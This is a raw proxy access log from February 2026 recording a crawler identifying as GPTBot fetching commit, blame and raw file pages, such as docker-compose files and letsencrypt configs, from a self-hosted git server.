192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" -[17/Feb/2026:13:43:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:13:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/" -[17/Feb/2026:13:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13481] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13183] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13510] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" -[17/Feb/2026:13:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" -[17/Feb/2026:13:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" -[17/Feb/2026:13:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" -[17/Feb/2026:13:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" -[17/Feb/2026:13:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" -[17/Feb/2026:13:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13149] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39568] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44637] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42201] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10140] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" -[17/Feb/2026:13:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51492] [Gzip 13.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fServices.tsx" [Client 74.7.227.38] [Length 26574] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" -[17/Feb/2026:13:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27247] [Gzip 11.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9499] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42033] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 74.7.227.38] [Length 21804] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" -[17/Feb/2026:13:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11896] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" -[17/Feb/2026:13:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11895] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" -[17/Feb/2026:13:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/graph" [Client 74.7.227.38] [Length 9645] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode" -[17/Feb/2026:13:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 74.7.227.38] [Length 23713] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" -[17/Feb/2026:13:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10082] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" -[17/Feb/2026:13:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10905] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:13:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10906] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:13:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" -[17/Feb/2026:13:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" -[17/Feb/2026:13:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11154] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" -[17/Feb/2026:13:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" -[17/Feb/2026:13:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" -[17/Feb/2026:13:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11154] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" -[17/Feb/2026:13:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" -[17/Feb/2026:13:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11153] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" -[17/Feb/2026:13:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10934] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:13:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10904] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:13:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10886] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:13:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10899] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:13:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10927] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:13:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10931] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:13:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10856] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:13:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10932] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:13:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 74.7.227.38] [Length 11576] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:44:10 +0000] - 200 200 - GET https 